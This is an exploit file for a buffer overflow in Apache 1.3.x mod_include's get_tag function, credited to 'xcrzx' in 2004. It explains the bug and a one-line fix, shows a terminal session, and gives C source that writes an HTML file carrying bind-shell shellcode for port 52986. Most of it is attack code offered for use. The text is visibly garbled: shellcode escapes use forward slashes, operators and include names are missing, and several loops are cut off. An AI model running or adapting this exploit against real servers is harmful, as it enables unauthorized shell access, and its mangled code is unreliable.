/ ************************************************** ***************************************
LOCAL EXPLOIT for MOD_INCLUDE OF APACHE 1.3.x *
Written by xcrzx / 18.10.2004/ *
Bug Found by xcrz / 18.10.2004/ *
*
Y0DAS Old Shao Lin Techniq Ownz u: Remember My Words *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3 *
*
Success, Tested on Apache 1.3.31 Under Linux RH9.0 (Shrike) *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Technical Details: *
*
There is an overflow in the get_tag function: *
*
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{ *
... *
term = c; *
while (1) { *
GET_CHAR(in, c, NULL, p); *
[1] if (t - tag == tagbuf_len) { *
*t = '\0'; *
return NULL; *
} *
/* Want to accept \" as a valid character within a string. */ *
if (c == '\\') { *
[2] *(t++) = c; /* add backslash */ *
GET_CHAR(in, c, NULL, p); *
if (c == term) { /* only if */ *
[3] *(--t) = c; /* replace backslash only for terminator */ *
} *
} *
else if (c == term) { *
break; *
} *
[4] *(t++) = c; *
} *
*t = '\0'; *
... *
*
As we can see, there is a check at [1] to determine the end of the tag buffer, *
but this check can be bypassed when the writes at [2] and [4] both happen *
in the same iteration without the [3] condition being taken. *
*
So an attacker can create a malicious file that overflows the static buffer *
that tag points to and execute arbitrary code with the privileges of the *
httpd child process. *
FIX: *
[1*] if (t - tag >= tagbuf_len - 1) { *
*
Notes: to activate mod_include you need to write "XBitHack on" in httpd.conf *
*
*********************************************************** ****************************** /
/ ************************************************** ***************************************
EXAMPLE OF WORK: *
*
[root @ blacksand htdocs] # Make 85Mod_include *
CC 85MOD_INCLUDE.C -O 85MOD_INCLUDE *
[root @ blacksand htdocs] # ./85MOD_INCLUDE 0XBFFF8196> Evil.html *
[root @ Blacksand HTDOCS] # chmod x evil.html *
[root @ blacksand htdocs] # Netstat -na | GREP 52986 *
[root @ blacksand htdocs] # Telnet localhost 8080 *
Trying 127.0.0.1 ... *
Connected to localhost. *
Escape Character is '^]'. *
Get /evil.html http / 1.0 *
^] *
Telnet> Q *
Connection closed. *
[root @ blacksand htdocs] # netstat -na | grep 52986 * tcp 0 0.0.0.0:52986 0.0.0.0:0:0:0:0:0:0:0:0:52986 0.0.0.0:0:56
[root @ blacksand htdocs] # *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
NOTES: Ha1fsatan - TI 4LOVEK-KAKASHKA :))) Be CO0L As Always *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Personal Hello to my parents :) *
*********************************************************** ****************************** /
/ ************************************************** ***************************************
Public SHOUTZ TO: M00 SECURITY, ECH0 :), Lbyte, 0xBadc0ded and Otherz *
*********************************************************** ****************************** /
#include
#include
#include
#define evilbuf 8202
#define htmltext 1000
#define html_format " / n / nxcrzx 0wn u / n html>"
#define author "/ n *** local expedition for mod_include of apache 1.3.x by xcrz / 18.10.2004/ *** / n"
INT main (int Argc, char ** argv) {
Char HTML [Evilbuf HTMLText];
Char Evilbuf [Evilbuf 1];
// can be changed
Char shellcode [] =
// bind shell on 52986 port
"/ x31 / xc0"
"/ X31 / XDB / X53 / X43 / X43 / X50 / X89 / XE1 / XB0 / X66 / XCD / X80 / X43"
"/ x66 / xc7 / x44 / x24 / x02 / x24 / x04 / x6a / x10 / x51 / x50 / x89" "/ xe1 / xb0 / x66 / xcd / x80 / x43 / x43 / XB0 / X66 / XCD / X80 / X43 / X89 / X61 / X08 / XB0 "
"/ X66 / XCD / X80 / X93 / X31 / XC9 / XB1 / X03 / X49 / XB0 / X3F / XCD / X80 / X75 / XF9 / X68"
"/ x2f / x73 / x68 / x20 / x68 / x6e / x88 / x4c / x24 / x07 / x89 / xe3 / x51"
"/ x53 / x89 / xe1 / x31 / xd2 / xb0 / x0b / xcd / x80";
// Execve / Tmp / SH <- Your OWN Program
/ *
"/ x31 / xc0 / x31 / xdb / xb0 / x17 / xcd / x80"
"/ xb0 / x2e / xcd / x80 / Xeb / x15 / x5b / x31"
"/ xc0 / x88 / x43 / x07 / x89 / x5b / x08 / x89"
"/ X43 / X0C / X8D / X4B / X08 / X31 / XD2 / XB0"
"/ X0B / XCD / X80 / XE8 / XE6 / XFF / XFF / XFF"
"/ TMP / SH";
* /
Char NOP [] = "/ x90 / x40"; // Special NOPS;)
CHAR EVILPAD [] = "// crzcrzcrzcrzc"; // trick;)
INT PADDING, XPAD = 0;
INT I, FD;
Long Ret = 0xBfff8688;
IF (Argc> 1) RET = Strtoul (Argv [1], 0, 16);
Else {fprintf (stderr, author "/ nusage:% s
Padding = (Evilbuf-1-Strlen (Shellcode) -4-Strlen (EVILPAD) 2);
While (1) {
IF (padding% 2 == 0) {padding / = 2; Break;}
Else {padding -; xpad ;}
}
MEMSET (HTML, 0x0, SIZEOF HTML);
MEMSET (Evilbuf, 0x0, Sizeof Evilbuf);
For (i = 0; i Memcpy (Evilbuf Strlen (Evilbuf), & NOP, 2); For (i = 0; i Memcpy (Evilbuf Strlen (Evilbuf), (Evilbuf [Strlen (Evilbuf) -1] == NOP [1])? (& nop [0]): (& nop [1]), 1); Memcpy (Evilbuf Strlen (Evilbuf), & shellcode, SizeOf shellcode; Memcpy (Evilbuf Strlen (Evilbuf), & EvilPad, SizeOf EvilPad; * (long *) & evilbuf [Strlen (Evilbuf)] = RET; Sprintf (HTML, HTML_FORMAT, EVILBUF); Printf ("% s", HTML); Return 0; }